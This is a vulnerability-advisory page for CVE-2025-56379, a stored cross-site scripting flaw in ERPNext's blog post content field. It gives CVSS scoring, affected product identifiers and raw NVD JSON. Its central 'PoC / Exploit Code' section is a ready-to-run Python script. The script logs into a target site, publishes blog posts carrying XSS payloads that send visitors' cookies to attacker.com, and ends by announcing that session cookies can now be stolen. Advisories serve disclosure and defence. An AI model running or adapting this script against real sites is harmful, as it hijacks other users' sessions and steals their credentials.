Security Vulnerability Report
中文
CVE-2025-56379 CVSS 5.4 MEDIUM

CVE-2025-56379

Published: 2025-10-02 14:15:46
Last Modified: 2025-10-03 19:15:50
Source: [email protected]

Description

A stored cross-site scripting (XSS) vulnerability in the blog post feature of ERPNEXT v15.67.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the content field.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:erpnext:15.67.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:frappe:frappe:15.72.4:*:*:*:*:*:*:* - VULNERABLE
ERPNEXT v15.67.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-56379 - ERPNEXT Stored XSS PoC # Vulnerability: Stored XSS in Blog Post content field # Affected Version: ERPNEXT v15.67.0 import requests # Configuration TARGET_URL = "https://target-erpnext-site.com" USERNAME = "attacker_user" PASSWORD = "attacker_password" # Step 1: Login to ERPNEXT to obtain session cookies session = requests.Session() login_data = { "usr": USERNAME, "pwd": PASSWORD } login_response = session.post(f"{TARGET_URL}/api/method/login", json=login_data) print(f"Login status: {login_response.status_code}") # Step 2: Craft malicious XSS payload for the blog content field # Various payload options for bypassing filters xss_payloads = [ # Basic script tag payload "<script>alert('XSS-CVE-2025-56379');document.location='https://attacker.com/steal?c='+document.cookie</script>", # Img tag with onerror event handler "<img src=x onerror=\"alert(document.domain);fetch('https://attacker.com/log?data='+document.cookie)\">", # SVG tag with onload event handler "<svg onload=\"alert('Stored XSS');document.location='https://attacker.com/?cookie='+document.cookie\">", # HTML entity encoded payload "<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>" ] # Step 3: Create a blog post with the malicious payload for idx, payload in enumerate(xss_payloads): blog_data = { "title": f"Interesting Blog Post {idx}", "content": payload, "blog_category": "General", "published": 1 } create_response = session.post( f"{TARGET_URL}/api/resource/Blog Post", json=blog_data, headers={"Accept": "application/json"} ) print(f"Blog post {idx} creation status: {create_response.status_code}") print(f"Response: {create_response.text}") # Step 4: Verify the payload is stored and will execute when viewed # When any user visits the blog post page, the malicious script will execute print("\n[!] Malicious blog posts created successfully.") print("[!] When any user views these blog posts, the XSS payload will execute in their browser.") print("[!] Attacker can now steal session cookies, perform actions on behalf of victims, etc.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56379", "sourceIdentifier": "[email protected]", "published": "2025-10-02T14:15:45.630", "lastModified": "2025-10-03T19:15:49.603", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting (XSS) vulnerability in the blog post feature of ERPNEXT v15.67.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the content field."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:erpnext:15.67.0:*:*:*:*:*:*:*", "matchCriteriaId": "C2D1FAC2-E38C-45C7-84E3-0D82B1BE88DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe:15.72.4:*:*:*:*:*:*:*", "matchCriteriaId": "76F8F843-7675-4B36-9972-1D001E2869F9"}]}]}], "references": [{"url": "https://github.com/MoAlali/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/MoAlali/CVE-2025-56379", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.linkedin.com/in/mohammedaloli/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://x.com/alaliksa_", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/MoAlali/CVE-2025-56379", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.